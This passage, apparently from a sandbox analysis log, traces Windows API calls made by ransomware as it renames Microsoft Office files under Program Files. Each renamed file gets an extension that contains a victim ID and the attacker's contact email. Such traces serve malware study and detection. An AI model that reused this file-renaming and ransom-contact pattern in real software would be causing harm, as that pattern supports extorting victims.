lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.653] CloseHandle (hObject=0x4c4) returned 1 [0166.654] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.655] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\Proof.Culture.msi.16_proof.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proof.culture.msi.16_proof.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.655] CloseHandle (hObject=0x4c4) returned 1 [0166.656] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.656] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proofing.msi.16_proofing.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.656] CloseHandle (hObject=0x4c4) returned 1 [0166.657] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.657] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\publishermui.msi.16_publishermui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.657] CloseHandle (hObject=0x4c4) returned 1 [0166.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0166.659] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.659] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.660] CloseHandle (hObject=0x4c4) returned 1 [0166.661] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.661] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\Proof.Culture.msi.16_proof.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\proof.culture.msi.16_proof.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.661] CloseHandle (hObject=0x4c4) returned 1 [0166.662] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.662] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\Proof.Culture.msi.16_proof.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\proof.culture.msi.16_proof.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.663] CloseHandle (hObject=0x4c4) returned 1 [0166.667] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.667] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Access.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\access.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.667] CloseHandle (hObject=0x4c4) returned 1 [0166.668] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.668] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\DCF.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\dcf.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.668] CloseHandle (hObject=0x4c4) returned 1 [0166.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Excel.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\excel.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Excel.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\excel.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.587] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.587] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Groove.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\groove.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.587] CloseHandle (hObject=0x52c) returned 1 [0167.729] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.729] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGPOS.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgpos.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.729] CloseHandle (hObject=0x434) returned 1 [0167.730] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.730] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.730] CloseHandle (hObject=0x434) returned 1 [0167.731] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.731] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.731] CloseHandle (hObject=0x434) returned 1 [0167.732] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.732] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.732] CloseHandle (hObject=0x434) returned 1 [0167.739] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.740] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.740] CloseHandle (hObject=0x434) returned 1 [0167.740] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.740] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.741] CloseHandle (hObject=0x434) returned 1 [0167.741] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.741] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.741] CloseHandle (hObject=0x434) returned 1 [0167.742] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.742] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.742] CloseHandle (hObject=0x434) returned 1 [0167.743] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.743] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.743] CloseHandle (hObject=0x434) returned 1 [0167.743] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.743] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.744] CloseHandle (hObject=0x434) returned 1 [0167.744] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.744] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.744] CloseHandle (hObject=0x434) returned 1 [0167.745] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.745] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.745] CloseHandle (hObject=0x434) returned 1 [0167.746] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.746] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.746] CloseHandle (hObject=0x434) returned 1 [0167.747] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.747] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.747] CloseHandle (hObject=0x434) returned 1 [0167.747] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.748] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.748] CloseHandle (hObject=0x434) returned 1 [0167.748] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.748] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.749] CloseHandle (hObject=0x434) returned 1 [0167.749] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.749] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.750] CloseHandle (hObject=0x434) returned 1 [0167.755] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.756] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPACE.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\space.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.756] CloseHandle (hObject=0x434) returned 1 [0167.757] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.757] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeAccess.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeaccess.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.757] CloseHandle (hObject=0x434) returned 1 [0167.758] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.758] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeExcel.nrr.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeexcel.nrr.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.758] CloseHandle (hObject=0x434) returned 1 [0167.758] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.758] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 